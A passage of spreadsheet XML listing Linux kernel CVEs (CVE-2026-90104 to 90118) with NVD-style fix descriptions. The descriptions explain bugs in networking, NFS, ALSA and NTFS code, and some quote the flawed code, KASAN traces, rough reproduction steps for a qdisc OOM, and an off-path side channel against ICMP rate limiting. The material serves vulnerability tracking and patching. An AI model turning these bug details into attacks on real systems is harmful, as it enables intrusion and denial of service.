      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90104</t>
        </is>
      </c>
      <c r="D472" s="5" t="inlineStr"/>
      <c r="E472" s="5" t="inlineStr"/>
      <c r="F472" s="5" t="inlineStr"/>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr"/>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4.1: zero referring call lists before decoding
decode_cb_sequence_args() allocates csa_rclists with kmalloc_objs(), so
each referring_call_list starts uninitialized. decode_rc_list() assigns
rcl_refcalls only when rcl_nrefcalls is nonzero. A valid list with zero
referring calls therefore leaves the pointer uninitialized, and
nfs4_callback_sequence() later passes stale slab contents to kfree().
Allocate csa_rclists with kzalloc_objs() so every rcl_refcalls member is
NULL from the beginning, including valid empty referring call lists.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90104</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90105</t>
        </is>
      </c>
      <c r="D473" s="5" t="inlineStr"/>
      <c r="E473" s="5" t="inlineStr"/>
      <c r="F473" s="5" t="inlineStr"/>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr"/>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: fix reading neigh ha
Currently arp/neigh_reduce read neigh ha directly which can lead to
partial reads while the neigh is being updated. Use neigh_ha_snapshot to
take a stable snapshot of the address similar to route_shortcircuit which
already does the right thing.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90105</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90106</t>
        </is>
      </c>
      <c r="D474" s="5" t="inlineStr"/>
      <c r="E474" s="5" t="inlineStr"/>
      <c r="F474" s="5" t="inlineStr"/>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr"/>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: arp/nd proxy: fix reading neigh ha
Currently neigh ha address is read directly, but that can result in
torn/partial reads if the neigh is being updated. Use neigh_ha_snapshot
to take a stable snapshot of the address.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90106</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90107</t>
        </is>
      </c>
      <c r="D475" s="5" t="inlineStr"/>
      <c r="E475" s="5" t="inlineStr"/>
      <c r="F475" s="5" t="inlineStr"/>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr"/>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: free pending qentry in smc_llc_flow_stop() before memset
smc_llc_flow_stop() resets a flow struct with a blind memset:
	spin_lock_bh(&amp;lgr-&gt;llc_flow_lock);
	memset(flow, 0, sizeof(*flow));
	flow-&gt;type = SMC_LLC_FLOW_NONE;
	spin_unlock_bh(&amp;lgr-&gt;llc_flow_lock);
If flow-&gt;qentry is non-NULL at this point the pointer is overwritten without the
allocation being freed, leaking one kmalloc object.
A late-arriving duplicate CONFIRM_LINK or ADD_LINK_CONT message can set
flow-&gt;qentry after the legitimate message has been consumed by the waiter via
smc_llc_flow_qentry_clr() (which NULLs the pointer but leaves flow-&gt;type
non-zero) but before the flow completes and smc_llc_flow_stop() runs.  In that
window the duplicate is stashed into flow-&gt;qentry, and then lost when
smc_llc_flow_stop() zeros the struct.
Call smc_llc_flow_qentry_del() inside the lock before the memset.
smc_llc_flow_qentry_del() already checks flow-&gt;qentry before freeing, so the
normal case where no entry is pending is a no-op.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90107</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90108</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2026-09-17</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr"/>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: free stashed qentry before overwrite in REQ_ADD_LINK to ADD_LINK transition
When smc_llc_event_handler() transitions the local LLC flow from
SMC_LLC_FLOW_REQ_ADD_LINK to SMC_LLC_FLOW_ADD_LINK on arrival of an ADD_LINK
request, it calls smc_llc_flow_qentry_set() unconditionally:
	if (lgr-&gt;llc_flow_lcl.type == SMC_LLC_FLOW_REQ_ADD_LINK) {
		lgr-&gt;llc_flow_lcl.type = SMC_LLC_FLOW_ADD_LINK;
		smc_llc_flow_qentry_set(&amp;lgr-&gt;llc_flow_lcl, qentry);
		...
	}
A CONFIRM_LINK or ADD_LINK_CONT arriving while flow-&gt;type is
SMC_LLC_FLOW_REQ_ADD_LINK is stashed into flow-&gt;qentry via the
SMC_LLC_CONFIRM_LINK / SMC_LLC_ADD_LINK_CONT handler (which stores into
flow-&gt;qentry for any non-NONE flow type).  When the subsequent ADD_LINK
arrives, the REQ_ADD_LINK branch overwrites flow-&gt;qentry with the new pointer
without first freeing the stashed allocation, leaking one kmalloc object.
The stashed entry has no consumer: smc_llc_wait() is only called from
llc_add_link_work, which is not yet scheduled while the flow type remains
REQ_ADD_LINK.  No waiter is sleeping on llc_msg_waiter at this point.
It is safe to unconditionally free any stashed qentry before
the overwrite.
Call smc_llc_flow_qentry_del() before smc_llc_flow_qentry_set() in the
REQ_ADD_LINK branch.  smc_llc_flow_qentry_del() already checks flow-&gt;qentry
before freeing, so the normal path where no entry is stashed is a no-op.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90108</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90109</t>
        </is>
      </c>
      <c r="D477" s="5" t="inlineStr"/>
      <c r="E477" s="5" t="inlineStr"/>
      <c r="F477" s="5" t="inlineStr"/>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr"/>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: sched: fix 32-bit backlog wrap in gred, bfifo and plug enqueue
gred_enqueue(), bfifo_enqueue() and plug_enqueue() admit a packet when the
current backlog plus the packet length fits within the queue limit:
  sch-&gt;qstats.backlog + qdisc_pkt_len(skb) &lt;= sch-&gt;limit (gred default VQ)
  gred_backlog+qdisc_pkt_len(skb) &lt;= q-&gt;limit  (gred configured VQ)
  sch-&gt;qstats.backlog + qdisc_pkt_len(skb) &lt;= sch-&gt;limit (bfifo)
  sch-&gt;qstats.backlog + skb-&gt;len &lt;= q-&gt;limit             (plug)
sch-&gt;qstats.backlog and q-&gt;backlog are u32, and qdisc_pkt_len()/skb-&gt;len
are unsigned int, so all sums are computed in 32 bits and wrap at 2^32.
Once the true backlog exceeds 4 GiB the wrapped sum becomes small and
admission keeps succeeding, so the queue grows without bound and the kernel
can be driven to OOM.
Promote the sums to u64 so admission stops once the true backlog exceeds
the limit.  The limit is u32, so the bounded queue stays below 2^32 and
the stored u32 backlog never wraps.
The bug can only be reproduced as root (albeit with ridiculous setup):
 attach a gred (or bfifo/plug) qdisc with a limit near 4 GiB,
 leaving the default VQ unconfigured (for gred), and drive &gt;4 GiB of
 queued traffic (e.g. via a size table / stab to inflate qdisc_pkt_len,
 or sustained high-rate traffic). The u32 backlog+len sum wraps at 2^32,
 admission keeps succeeding, and the queue grows unboundedly to OOM.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90109</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90110</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2026-09-17</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr"/>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
inetpeer: randomize RB-tree node comparison using SipHash
The inetpeer rate limiting system stores peer entries in a Red-Black tree
keyed deterministically on the remote IP address. Because tree lookups walk
the RB-tree using standard lexicographical comparisons (inetpeer_addr_cmp),
an off-path adversary can predict the exact topology of the tree and the
sequence of nodes traversed during lookups (the gc_stack candidate list).
By combining deterministic tree traversal with aggressive garbage collection
(triggered when tree size exceeds inet_peer_threshold), an attacker can
selectively force the eviction of targeted inet_peer nodes. When an evicted
node is subsequently re-created upon receiving a new packet, its rate-limiting
token bucket (rate_tokens, rate_last) is reset to full capacity. This creates
a side-channel primitive allowing off-path attackers to bypass IP-keyed ICMP
rate limits and infer open UDP ports (similar to SAD DNS style attacks).
Mitigate this by randomizing the RB-tree node comparison logic using SipHash
with a secret key (inetpeer_hash_key) initialized via net_get_random_once().
Nodes are ordered in the tree by SipHash(addr, key) rather than raw IP
addresses. Because the secret key is unknown to external entities, the tree
layout and lookup traversal paths are unpredictable to off-path adversaries,
breaking the deterministic eviction gadget.
Cache the computed 64-bit SipHash (hash) in struct inet_peer and compute the
target hash (dhash) once at the beginning of inet_getpeer() to avoid recomputing
SipHash at every step of the RB-tree walk.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90110</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90111</t>
        </is>
      </c>
      <c r="D479" s="5" t="inlineStr"/>
      <c r="E479" s="5" t="inlineStr"/>
      <c r="F479" s="5" t="inlineStr"/>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr"/>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip6mr: do not clone dst in ip6mr_cache_report()
IPv6 input attaches a non-refcounted (NOREF) dst to skbs under RCU.
When an ingress multicast packet misses MFC lookup,
ip6mr_cache_unresolved() places the skb onto the unresolved queue,
escaping the receive-side RCU grace period.
If the underlying route is deleted and freed, and the MFC queue is later
resolved with a wrong parent interface, ip6_mr_forward() invokes
ip6mr_cache_report(..., MRT6MSG_WRONGMIF), which executes
dst_clone(skb_dst(pkt)) on the freed dst entry, triggering a slab
use-after-free.
Report packets queued to mroute6_sk (a raw socket) and netlink
notifications do not require an attached dst entry.
Fix this by:
1. Removing dst_clone() in ip6mr_cache_report() and ensuring report skbs
   do not hold a dst.
2. Dropping skb_dst before queuing unresolved skbs in
   ip6mr_cache_unresolved(), matching the fact that multicast
   forwarding resolves outgoing routes anew via ip6_route_output().</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90111</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90112</t>
        </is>
      </c>
      <c r="D480" s="5" t="inlineStr"/>
      <c r="E480" s="5" t="inlineStr"/>
      <c r="F480" s="5" t="inlineStr"/>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr"/>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: qlcnic: validate unified ROM sections before loading
The unified ROM parser reads directory, product, and data-descriptor fields
from the firmware file.  Existing validation forms table and data ends with
unchecked additions and multiplications.  Malformed values can wrap before
they are compared with the firmware size.  The parser also dereferences
typed pointers at firmware-controlled offsets.
Valid descriptor extents alone are insufficient for the consumers.  The
loader reads a fixed-size bootloader regardless of its declared size, the
version parser assumes a 17-byte tail, and a partial final firmware word is
read as a full u64.  A truncated image can therefore make the driver read
beyond the firmware allocation during validation or loading.
Replace the pointer-returning parser with bounded range helpers.  Validate
table entry sizes, descriptor indices, section ranges, the fixed
bootloader load length, and the version tail before exposing any section.
Read all file fields with unaligned little-endian accessors and assemble a
partial final word from only the bytes that remain.  Apply the same range
checks to the legacy image before reading its fixed fields.</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90112</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90113</t>
        </is>
      </c>
      <c r="D481" s="5" t="inlineStr"/>
      <c r="E481" s="5" t="inlineStr"/>
      <c r="F481" s="5" t="inlineStr"/>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr"/>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netdevsim: update queue NAPI association on queue reset
In netdevsim, receive queues (struct nsim_rq) embed their own struct
napi_struct. When queue reset is performed (e.g. via queue_reset
debugfs), nsim_queue_start() swaps in a newly allocated struct nsim_rq,
and nsim_queue_mem_free() later deletes and frees the old one.
However, nsim_queue_start() failed to update the queue-to-NAPI mapping
via netif_queue_set_napi(). As a result, dev-&gt;_rx[idx].napi continued to
point to the old NAPI struct. After the old queue was freed, a subsequent
queue dump via Netlink (NETDEV_CMD_QUEUE_GET) triggered a KASAN
slab-use-after-free read in nla_put_napi_id() when accessing
rxq-&gt;napi-&gt;napi_id.
Fix this by calling netif_queue_set_napi() in nsim_queue_start() to
associate the new NAPI with the RX queue, and clear the association
with netif_queue_set_napi(..., NULL) in nsim_del_napi() during teardown.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90113</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90114</t>
        </is>
      </c>
      <c r="D482" s="5" t="inlineStr"/>
      <c r="E482" s="5" t="inlineStr"/>
      <c r="F482" s="5" t="inlineStr"/>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr"/>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: Reject descending VLAN tunnel ranges
A pair of descending VLAN and tunnel IDs can pass the tunnel range span
check. The VLAN subtraction produces a negative int, which is converted
to unsigned when compared with the u32 tunnel ID subtraction. It can
therefore equal the wrapped tunnel ID delta.
The range loop then performs no iterations. Since the batched
notification handling added a post-loop error check, this leaves err
uninitialized and makes the request's return value unpredictable.
Reject descending VLAN ranges before comparing the spans. Valid
ascending and single-entry ranges remain unchanged, while malformed
descending ranges consistently return -EINVAL.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90114</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90115</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2026-09-17</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr"/>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xsk: fix NULL pointer dereference in __xsk_rcv()
In the __xsk_rcv() multi-buffer path, xsk_buff_alloc() is called in a
loop without checking its return value. xsk_buff_can_alloc() only
counts fill queue entries without validating their addresses, so it
can succeed while xsk_buff_alloc() rejects all remaining entries and
returns NULL.
  Oops: general protection fault, probably for non-canonical address
   0xdffffc0000000000
  KASAN: null-ptr-deref in range
   [0x0000000000000000-0x0000000000000007]
  RIP: 0010:__xsk_rcv+0x426/0xc20 (net/xdp/xsk.c:350)
  Call Trace:
   xsk_generic_rcv+0x26d/0x5f0
   xdp_do_generic_redirect+0x3c5/0xcf0
   do_xdp_generic+0x92f/0xe70
   __netif_receive_skb_core.constprop.0+0xf7e/0x2b30
Fix this with a two-stage transaction. First allocate and stage all
buffers required for the packet, recycling all staged buffers with
xsk_buff_free() if any allocation fails. Only after this stage
succeeds, copy the data, reserve the RX descriptors, and release the
buffers in an error-free loop.</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90115</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90116</t>
        </is>
      </c>
      <c r="D484" s="5" t="inlineStr"/>
      <c r="E484" s="5" t="inlineStr"/>
      <c r="F484" s="5" t="inlineStr"/>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr"/>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: mtpav: shut down output timer before card teardown
snd_mtpav_output_timer() rearms chip-&gt;timer while holding
chip-&gt;spinlock and accesses the card-private mtpav state.
snd_mtpav_free() currently takes the same lock and calls
timer_delete() when the timer is active. This only removes a
pending timer; it does not wait for a callback that is already
running and does not prevent the callback from rearming the timer.
A callback running on another CPU can therefore continue after
snd_mtpav_free() releases the lock and access the card-private
state while the card is being torn down. It can also rearm the
timer after timer_delete() has returned.
Call timer_shutdown_sync() without holding chip-&gt;spinlock. This
waits for any running callback to finish and prevents further
rearming before the card-private mtpav state is released.</t>
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90116</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90117</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2026-09-17</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr"/>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: validate usa_ofs before preserving the update sequence number
When ntfs_mft_record_alloc() reuses a free mft record it reads the old
update sequence number straight from the on-disk record:
     usn = *(__le16 *)((u8 *)m + le16_to_cpu(m-&gt;usa_ofs));
Here m points into the raw $MFT page-cache folio, which still holds
unvalidated, MST-protected bytes: the folio is read by a plain
iomap_read_folio() and neither post_read_mst_fixup() nor
ntfs_mft_record_check() has run on it (both work on private copies).
m-&gt;usa_ofs is therefore an untrusted u16, and a corrupted record can put
it past the end of the record so the two-byte read lands outside the
folio.  Reading such a record while creating a file gives, under KASAN:
   BUG: KASAN: use-after-free in ntfs_mft_record_alloc+...
   Read of size 2 at addr ...
    ntfs_mft_record_alloc -&gt; __ntfs_create -&gt; ntfs_create -&gt; path_openat
Only preserve the old update sequence number when usa_ofs is even and in
range, mirroring the check ntfs_mft_record_check() already applies;
otherwise leave usn zero, which the existing restore below skips.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90117</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90118</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2026-09-17</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr"/>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: fix off-by-one page overflow in ntfs_decompress()
The per-token range check in ntfs_decompress() uses
	if (cb &gt;= cb_sb_end || dp_addr &gt; dp_sb_end)
		break;
so dp_addr == dp_sb_end falls through to the symbol copy
`*dp_addr++ = *cb++`, writing one byte past the destination page.  Since
NTFS_SB_SIZE == PAGE_SIZE the destination is a single page, so the byte
